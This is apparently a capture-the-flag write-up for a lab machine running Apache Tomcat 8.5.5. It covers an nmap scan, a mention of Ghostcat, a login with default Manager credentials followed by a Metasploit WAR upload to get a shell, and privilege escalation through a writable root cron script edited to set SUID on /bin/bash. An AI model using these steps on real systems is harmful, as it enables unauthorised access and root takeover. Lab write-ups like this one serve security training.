# Tasks
1. user.txt
2. root.txt


# NMAP SCAN
```nmap
PORT     STATE SERVICE VERSION  
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)  
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)  
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)  
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)  
|_ajp-methods: Failed to get a valid response for the OPTION request  
8080/tcp open  http    Apache Tomcat 8.5.5  
|_http-favicon: Apache Tomcat  
|_http-title: Apache Tomcat/8.5.5  
|_http-open-proxy: Proxy might be redirecting requests  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Findings
## Web
- Using Apache Tomcat, might be vulnerable to CVE-2020-1938.
- Version 8.5.5 of Tomcat is vulnerable to Ghostcat.
- We can use Metasploit to exploit this vulnerability.
- But not sure what file to read. 

# Foothold
- Viewing the page we can check out Manager App.
- It asks for a username and password
- It we don't supply it errors out and shows a username and password.
`<user username="tomcat" password="s3cret" roles="manager-gui"/>`
- Default credentials?
- We can login and upload a .war file. We can use a module in Metasploit.
`exploit(multi/http/tomcat_mgr_upload)`
- We now have a shell as user tomcat.

# Privilege Escalation
- There is one interesting script being run in /home/jack
`id.sh`
```bash
!#/bin/bash
id > test.txt
```

```bash
uid=0(root) gid=0(root) groups=0(root)
```
So the script is being run as root? Interesting.
```bash
*  *    * * *   root    cd /home/jack && bash id.sh
````

- Some reason we have write permission to that file, let's make it malicious
```bash
!# /bin/bash
chmod 4777 /bin/bash
```
We could just `cat` the root.txt, but it's fun being root.
Let's wait and see
```bash
2021/09/06 01:04:01 CMD: UID=0    PID=1245   | bash id.sh   
2021/09/06 01:04:01 CMD: UID=0    PID=1244   | /bin/sh -c cd /home/jack && bash id.sh
```
After some time the command is being run as UID 0 which is root.


